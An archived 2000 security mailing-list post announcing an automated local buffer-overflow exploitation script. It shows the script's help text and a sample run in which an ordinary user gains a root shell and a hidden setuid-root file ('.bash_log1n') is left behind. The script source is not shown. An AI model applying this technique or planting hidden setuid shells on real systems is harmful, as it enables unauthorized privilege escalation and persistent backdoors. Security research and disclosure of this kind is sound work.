Vulnerability Development mailing list archives
New Tool: initd_.sh;
From: "za () boo ma fu" <initd_ () digital net>
Date: Tue, 5 Sep 2000 01:17:15 -0400
/*** Attachment did not send... resending (sorry for the bulk) ***/ Heyas ;) I wrote this tool in the last couple of days to see if I could actually implement a program that would automatically attack local binaries and attempt to find exploits in respect to buffer overflows via command line switches. Despite the script's simplicity I do believe it is a powerful tool that will aid in securing any Linux box although I refuse to blindly advertise this as an end all be all to local security. As I note in the readme there are numerous discrepancies that limit the programs strength, however, _most_ (if not all) of these issues will be resolved in upcoming releases of this program. Instead of explaining the entire process and capability I'll just paste the --help output at the end of this message. Also I'll paste an example usage for fun ;D This program is a first of its kind as far as I know ;) I'm pretty excited to see the response I get from the community. Portability to as many operating systems as possible will be integrated asap, however it will take a week or two as I am generating the configurable shellcode myself (something I have never done before at this level). Anyway, I hope you enjoy this beta release! Sincerely, initd_ initd_ () digital net 0x7F Security Research Restless eyes and erratic blue flicker While devilish fingers dance and slither The sound of electricity, relentless, hums.... ....When something wicked this way comes - initd_'s verse >;) ---- Help Output ---- seychelles.initd_ % ./initd_.sh Note: For further explanation on switches consult documentation usage: initd_.sh [options] options: -t filename Define the target binary as 'filename' --min_buffer int Define minimum buffer size as 'int' --max_buffer int Define maximum buffer size as 'int' --jmp_buffer int Define buffer increment value as 'int' --min_offset int Define minimum offset size as 'int' --max_offset int Define maximum offset size as 'int' --jmp_offset int Define offset increment value as 'int' --tmp_dir dir Force all tmp files to be written to 'dir' --rsd_dir dir Force the RSD directory to be 'dir' --rsdct_dir dir Force the RSDCT directory to be 'dir' --et_dir dir Force the ET directory to be 'dir' --uid int Force user id of target binary to 'int' --gid int Force group id of target binary to 'int' -n Do not query program for command line switches -s switches Pass a quoted string of switches to test -q Switch messaging to quiet mode -v Increase program verbocity (3 levels max) --help | -h Display program usage Send comments/questions/bugs to: initd_ () digital net 0x7f Security Research Team: Dangerously Deadicated. . . --- EOHelp --- phoenix.initd_ % id uid=1000(initd_) gid=100(users) groups=100(users) phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex --min_buffer 1024 -v -v -v # # initd_.sh # Automated Exploitation Tool v0.0.3 # # 0x7f Security Research: Something Wicked This Way Comes... # [+] Target Confirmed [+] Binary is not stripped [+] Strip has been located. Exploit stealth has increased [+] Confirmed temp directory [+] RSD Directory confirmed [+] Configuring for a Linux system on a i586 chip [ ] Owner of target is root [ ] Group name of target is root [+] User id # determined to be 0 [+] Group id number determined to be 0 [ ] Creating the Root Shell Dropper [+] RSD Creation Successful [ ] Creating Root Shell Dropper Configuration Tool [+] RSDCT Creation Successful [ ] Creating Exploitation Tool [+] ET Creation Succeeded [ ] Current Switch: -s [ ] Current Buffer Size: 1024 [ ] Current Offset: -100 [ ] Current Offset: 0 [ ] Current Offset: 100 [ ] Current Offset: 200 [ ] Current Offset: 300 [ ] Current Offset: 400 [+] Executing Cleanup [+] Cleanup Complete [ ] Welcome to the Dark Side sh-2.02# id uid=0(root) gid=0(root) groups=100(users) sh-2.02# exit exit phoenix.initd_ % ls -la total 38 drwxr-xr-x 2 initd_ users 1024 Sep 5 01:05 . drwxr-xr-x 4 initd_ users 1024 Sep 5 00:31 .. -rwsr-sr-x 1 root root 3192 Sep 5 01:05 .bash_log1n -rw-r--r-- 1 initd_ users 9863 Sep 5 00:30 Readme -rwxr-xr-x 1 initd_ users 21313 Sep 5 00:22 initd_.sh phoenix.initd_ % ---EOF--- Enjoy ;)
Attachment:
initd_.tar.gz
Description:
Current thread:
- New Tool: initd_.sh; za () boo ma fu (Sep 04)